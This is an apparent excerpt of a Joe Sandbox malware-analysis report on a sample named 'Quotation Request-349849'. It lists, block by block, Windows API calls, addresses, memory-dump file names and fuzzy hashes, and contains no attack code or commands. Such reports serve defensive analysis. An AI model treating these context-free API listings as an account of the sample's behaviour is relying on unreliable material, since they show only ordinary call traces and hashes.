                                                      • Opcode Fuzzy Hash: f50f35d80366f0565f285728f18c9c028300fa725dd61dcbef8dfda58d65f623
                                                      • Instruction Fuzzy Hash: D931E071501229EFDF14CFA8E94CA9E3BB5FB04316F10822AF925E71D1CBB49954CB91
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0082B204
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0082B221
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0082B259
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0082B27F
                                                      • _wcsstr.LIBCMT ref: 0082B289
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                      • String ID:
                                                      • API String ID: 3902887630-0
                                                      • Opcode ID: a095d4e3aab2dc4607a7100314d16c702bb29e6ff8965ad3c0882f5da0aa916f
                                                      • Instruction ID: 365107395fdab250249ed36e54d1a94e3ceed11b34236f75cb32f188c1585b2b
                                                      • Opcode Fuzzy Hash: a095d4e3aab2dc4607a7100314d16c702bb29e6ff8965ad3c0882f5da0aa916f
                                                      • Instruction Fuzzy Hash: C5210772605314FBEB159B79AC09E7F7B9CEF49710F104139F904DA2A2EF65DC8092A0
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0085B192
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0085B1B7
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0085B1CF
                                                      • GetSystemMetrics.USER32(00000004), ref: 0085B1F8
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00840E90,00000000), ref: 0085B216
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: 7d67f23cfd4203c8cef89165abacad7ba29e9eb2463375e90b38143980577f37
                                                      • Instruction ID: 4cd90cf5e27491c88eb390980bc3944f50dbd2c14862482cbee7827fb09f7a5b
                                                      • Opcode Fuzzy Hash: 7d67f23cfd4203c8cef89165abacad7ba29e9eb2463375e90b38143980577f37
                                                      • Instruction Fuzzy Hash: 3821A171A60655AFCB109F78DC18A6A3BA4FB25362F144739FD32D71E0E7309814CB90
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00829320
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00829352
                                                      • __itow.LIBCMT ref: 0082936A
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00829392
                                                      • __itow.LIBCMT ref: 008293A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow$_memmove
                                                      • String ID:
                                                      • API String ID: 2983881199-0
                                                      • Opcode ID: b738f274ab8d1c293d7e048741a31f2c080fe6171b914dad71e19b40d56433e2
                                                      • Instruction ID: e73ad8da24c9053957c3f1bf05e6eef56b78b4c0a34601cd4efada340ce13478
                                                      • Opcode Fuzzy Hash: b738f274ab8d1c293d7e048741a31f2c080fe6171b914dad71e19b40d56433e2
                                                      • Instruction Fuzzy Hash: 2B21C531700218ABDB10EA649C8DEBE7BADFB58710F045026FE85D73D1E6B48D85C7A1
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00845A6E
                                                      • GetForegroundWindow.USER32 ref: 00845A85
                                                      • GetDC.USER32(00000000), ref: 00845AC1
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00845ACD
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00845B08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: 1710b847e641523b2c35c01c6289bc3b82d1064e3b51a9f57a1acf8323431984
                                                      • Instruction ID: 26574c5ec9d5f1812e27ecdda9df41db380653d501f11046f1cfc7283d22c0aa
                                                      • Opcode Fuzzy Hash: 1710b847e641523b2c35c01c6289bc3b82d1064e3b51a9f57a1acf8323431984
                                                      • Instruction Fuzzy Hash: 51215075A00208AFDB14EF69D888A6ABBF5FF48311F148479F909D7352CA74AD00CB90
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007D134D
                                                      • SelectObject.GDI32(?,00000000), ref: 007D135C
                                                      • BeginPath.GDI32(?), ref: 007D1373
                                                      • SelectObject.GDI32(?,00000000), ref: 007D139C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 80b1d4ead50e7370ade45f6a0f5733f6252cb78f8457f0567aaa88575ff1625b
                                                      • Instruction ID: b7ab3ce6680bdae7365dbcf84b27b230145460a8de65a185041d7eb33cbefd00
                                                      • Opcode Fuzzy Hash: 80b1d4ead50e7370ade45f6a0f5733f6252cb78f8457f0567aaa88575ff1625b
                                                      • Instruction Fuzzy Hash: 26217130801B08EFDB12AF25DD0876A7BB8FB10722F5C4227F811A66B1D7799891DF90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: bf9fd7ea538d4562b3216959fbe2af3f119bd628cd622c45fdfe2202e87adb31
                                                      • Instruction ID: 9e8b68b50e54a10eca3afb38fb3d42d41e5ba7763a5d56d4f7a7017a3b9c6d90
                                                      • Opcode Fuzzy Hash: bf9fd7ea538d4562b3216959fbe2af3f119bd628cd622c45fdfe2202e87adb31
                                                      • Instruction Fuzzy Hash: 8B0180B160252DBAD2046B116D42FBBA75CFF603A8F044021FE15D6382EB59DE9082A0
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00834ABA
                                                      • __beginthreadex.LIBCMT ref: 00834AD8
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00834AED
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00834B03
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00834B0A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: c9361c9026a178edee0b1f07328af20462791af1de9a3f7f657909c9a37c21c4
                                                      • Instruction ID: 900c3a88be833b12b8d7f70ddac174992ce9f3d9b8707b07212ab9f0b1ebac54
                                                      • Opcode Fuzzy Hash: c9361c9026a178edee0b1f07328af20462791af1de9a3f7f657909c9a37c21c4
                                                      • Instruction Fuzzy Hash: 3E110476905618BBC702AFE8AC08A9B7FACFB85321F18426AF924D3351D675D90087E0
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0082821E
                                                      • GetLastError.KERNEL32(?,00827CE2,?,?,?), ref: 00828228
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00827CE2,?,?,?), ref: 00828237
                                                      • HeapAlloc.KERNEL32(00000000,?,00827CE2,?,?,?), ref: 0082823E
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00828255
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: 2d4f01c994fceb13f1f8a4d32726a00f71710994aa13c6481321ea337f1c87ff
                                                      • Instruction ID: 0dea407fa3fcd190319aad29bf5972b158a2a76e2844323a5dca1c972dcc928f
                                                      • Opcode Fuzzy Hash: 2d4f01c994fceb13f1f8a4d32726a00f71710994aa13c6481321ea337f1c87ff
                                                      • Instruction Fuzzy Hash: 2D016971242724FFDF204FA6EC48DAB7BACFF8A756B500469F909C3220DA358C40CA60
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?,?,00827455), ref: 00827127
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 00827142
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 00827150
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?), ref: 00827160
                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 0082716C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: edafb01982287621783a3a3da7396c041aa5b5ca6b881ace0b87ecdba9fbf8e4
                                                      • Instruction ID: 0830ac3391511a71cde35a1ed6180324a43e07e4ca7834a2ce4b362e909e6353
                                                      • Opcode Fuzzy Hash: edafb01982287621783a3a3da7396c041aa5b5ca6b881ace0b87ecdba9fbf8e4
                                                      • Instruction Fuzzy Hash: 7A018472601324BBDB114F65EC44BAA7BADFF48752F140074FE04D2211D735DD909BA0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00835260
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0083526E
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00835276
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00835280
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008352BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: e7c8804debd60b4943cb0fa4dde6821b76492cb9e86a46cb828de0229e500197
                                                      • Instruction ID: dc2ed090014a08b53979501babca574096034a0e1e423c153c8ee56b7eeaaa27
                                                      • Opcode Fuzzy Hash: e7c8804debd60b4943cb0fa4dde6821b76492cb9e86a46cb828de0229e500197
                                                      • Instruction Fuzzy Hash: FA012931D02A1DDBCF00EFE4EC49AEEBB78FB49712F410556EA45F2291CB34955487A1
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828121
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0082812B
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0082813A
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00828141
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00828157
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: b3cec53dba41095fe936182b8004a93ae301e92593ea4388f287f12a3139cf4d
                                                      • Instruction ID: bff57e943c46d766b449c1435ca34df3b83d7bec011bfb305545a193cbe16bfb
                                                      • Opcode Fuzzy Hash: b3cec53dba41095fe936182b8004a93ae301e92593ea4388f287f12a3139cf4d
                                                      • Instruction Fuzzy Hash: 07F0C270242324EFEB120FA4EC8DE6B3BACFF49755F000025FA45C3191CB649C55DA60
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0082C1F7
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0082C20E
                                                      • MessageBeep.USER32(00000000), ref: 0082C226
                                                      • KillTimer.USER32(?,0000040A), ref: 0082C242
                                                      • EndDialog.USER32(?,00000001), ref: 0082C25C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 9f84859f1a7658db4564a56509664cb59fa75e2a2b594d6f59ea861d6619fd46
                                                      • Instruction ID: eb80ff3be8fff552892294daf065b306f6a538341d13f8208721ff41dbf20304
                                                      • Opcode Fuzzy Hash: 9f84859f1a7658db4564a56509664cb59fa75e2a2b594d6f59ea861d6619fd46
                                                      • Instruction Fuzzy Hash: 9801A730404314D7EB206B60ED4EFA677B8FF10707F00026AB642D14E1DBE469848B50
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 007D13BF
                                                      • StrokeAndFillPath.GDI32(?,?,0080B888,00000000,?), ref: 007D13DB
                                                      • SelectObject.GDI32(?,00000000), ref: 007D13EE
                                                      • DeleteObject.GDI32 ref: 007D1401
                                                      • StrokePath.GDI32(?), ref: 007D141C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 6c340df5fe38538d324cb24d85a28841f35ab12c35cb9ab3507dad7a16376884
                                                      • Instruction ID: 6ed18c7075f3d240c8a1c959f138882a19abbd5718e49fa37919dea18e5b3d38
                                                      • Opcode Fuzzy Hash: 6c340df5fe38538d324cb24d85a28841f35ab12c35cb9ab3507dad7a16376884
                                                      • Instruction Fuzzy Hash: 37F0B230005B48EBDB126F26EC4C75A3FA4BB01326F5C8236F529991F2C7398995DF60
                                                      APIs
                                                        • Part of subcall function 007F0DB6: std::exception::exception.LIBCMT ref: 007F0DEC
                                                        • Part of subcall function 007F0DB6: __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 007D7A51: _memmove.LIBCMT ref: 007D7AAB
                                                      • __swprintf.LIBCMT ref: 007E2ECD
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007E2D66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: 0209501bb7268ab5e9288ec6676b310ddee91ff653b4eabc9ed89588d4bad583
                                                      • Instruction ID: 1929b6faeaf90264bb6c6770fe0182370e8fcc6df4bf45cea9ca3cf701704e6f
                                                      • Opcode Fuzzy Hash: 0209501bb7268ab5e9288ec6676b310ddee91ff653b4eabc9ed89588d4bad583
                                                      • Instruction Fuzzy Hash: 64914C71108255DFC718EF28C89986EB7B8FF89710F04491EF5859B2A2EA38ED45CB52
                                                      APIs
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                      • CoInitialize.OLE32(00000000), ref: 0083B9BB
                                                      • CoCreateInstance.OLE32(00862D6C,00000000,00000001,00862BDC,?), ref: 0083B9D4
                                                      • CoUninitialize.OLE32 ref: 0083B9F1
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      • Opcode ID: f4cf7005682ceb4b5e317bce9ba668a095f61538b52daaf4fc87717eba9f41a8
                                                      • Instruction ID: 4290cf166600a67cbbe277548c5334ae8a9b9bb40540ec5a9f6b115e6788ef89
                                                      • Opcode Fuzzy Hash: f4cf7005682ceb4b5e317bce9ba668a095f61538b52daaf4fc87717eba9f41a8
                                                      • Instruction Fuzzy Hash: B9A121B56042059FCB00DF14C884D2ABBE5FF89724F048999F9999B3A2CB35EC45CB91
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 007F50AD
                                                        • Part of subcall function 008000F0: __87except.LIBCMT ref: 0080012B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 6d280a8068af769aa888b7944c0b2211b336445beaecdc48497dde00040ff0e3
                                                      • Instruction ID: 98a9104e822b782fb793fb031df1153c6579dacf8c7f9ab26de48faa8c5dc77f
                                                      • Opcode Fuzzy Hash: 6d280a8068af769aa888b7944c0b2211b336445beaecdc48497dde00040ff0e3
                                                      • Instruction Fuzzy Hash: AA514931A08A0A96DB527728CD0537E3B95FB41710F208D59E6D5C63EAEE388DC49EC6
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
